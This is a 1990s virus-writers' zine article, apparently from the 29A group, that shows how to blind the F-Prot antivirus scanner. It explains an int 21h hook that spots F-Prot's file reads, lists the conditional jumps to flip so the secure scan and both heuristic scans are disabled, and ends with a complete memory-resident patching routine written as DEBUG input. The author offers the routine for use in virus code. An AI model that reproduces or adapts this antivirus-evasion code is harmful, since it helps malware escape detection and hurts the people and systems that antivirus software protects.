Chilling Fridrik ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Blade Runner The reason of writing this article is that i realised that i've never seen how to fool F-Prot in any virus magazine... and as i like to be o- riginal, i decided to have a look at it and try to do some modifications in its code so it won't detect any virus... and i got it :) And believe me that it's quite easy to do... just keep reading the arti- cle and try it by yourself following the next steps :) Ok, F-Prot, unlike TbScan, uses int 21h for opening, reading, and so on, that is, for scanning files for any infection. When it reads from a file, it does it holding the next values: AX=3f00h BX=0008h CX=0800h Since we know this, it's very easy for us to intercept this kind of calls to the int 21h with something like this: new_int_21h: cmp ax,3f00h jne jump_back cmp bx,8 jne jump_back cmp cx,800h je fprot_read jump_back: db 0eah old_int_21h dw ?,? Once we know that it's a F-Prot read, we can start doing our work... the unique things we must do for it to don't detect absolutely anything is to bypass the secure scan and the two types of heuristic scanning it uses. Let's see the way in which we can do this thingy :) ²²²²²²²²²²²²²²²²²²²²²²²²²²² ²² Secure method ²² ²²²²²²²²²²²²²²²²²²²²²²²²²²² 803FD0 CMP BYTE PTR [BX],D0 >7519 JNZ 0123 <<< change this for JZ C41E502D LES BX,[2D50] 26 ES: 807F01CF CMP BYTE PTR [BX+01],CF >750E JNZ 0123 <<< change this for JZ 9AF500C136 CALL 36C1:00F5 C706D64B0000 MOV WORD PTR [4BD6],0000 C706D44B0000 MOV WORD PTR [4BD4],0000 C41E502D LES BX,[2D50] 26 ES: >803FFF CMP BYTE PTR [BX],4D <<< change 4dh for 0ffh 750B JNZ 0121 C41E502D LES BX,[2D50] 26 ES: 807F015A CMP BYTE PTR [BX+01],5A 742A JZ 014B ²²²²²²²²²²²²²²²²²²²²²²²²²²² ²² First heuristic ²² ²²²²²²²²²²²²²²²²²²²²²²²²²²² 9A2605AF1F CALL 1FAF:0526 0BC0 OR AX,AX >740E JZ 0117 <<< change this for jnz FF36E43D PUSH [3DE4] 9A0000794A CALL 4A79:0000 ²²²²²²²²²²²²²²²²²²²²²²²²²²²² ²² Second heuristic ²² ²²²²²²²²²²²²²²²²²²²²²²²²²²²² 833EBF5500 CMP WORD PTR [55BF],+00 >7402 JZ 0109 <<< change this for jnz EB32 JMP 013B 81FE8713 CMP SI,1387 7524 JNZ 0133 And that's all, folks... since this five bytes have been changed, F-Prot will *NOT* detect any virus. As a last thing i'll include the complete routine, though it's a trivial thing, so you can implement it in your re- tro code; as i always use debug for coding, i think you'll have to adapt it, but anyway... :) And don't ask me why do i always use debug for coding instead the tra- ditional .ASM text file and TASM or A86... :) >- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 na-fp.com a100 jmp 0174 a110 cmp ah,3f jz 0117 jmp 0125 cmp bx,+08 jz 011e jmp 0125 cmp cx,0800 jz 0130 nop cs: jmp far [0103] a130 push ax push bx push cx push dx push ds mov ax,ss sub ax,3295 mov ds,ax mov bx,01a2 mov cl,f0 mov [bx],cl mov cl,74 mov bx,042b mov [bx],cl mov bx,0420 mov [bx],cl mov ax,ss sub ax,3521 mov ds,ax mov bx,03e8 mov cl,75 mov [bx],cl mov ax,ss sub ax,17c7 mov ds,ax mov bx,0347 mov [bx],cl pop ds pop dx pop cx pop bx pop ax cs: jmp far [0103] a174 mov dx,197 mov ah,9 int 21 mov ax,3521 int 21 mov [0103],bx mov [0105],es mov dx,0110 mov ax,2521 int 21 mov dx,0174 int 27 a197 db "F-Prot won't detect any virus","$" db " (c) Blade Runner/29A, 1996 ","$" rcx be w q >- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 Blade Runner/29A Los Angeles, 2019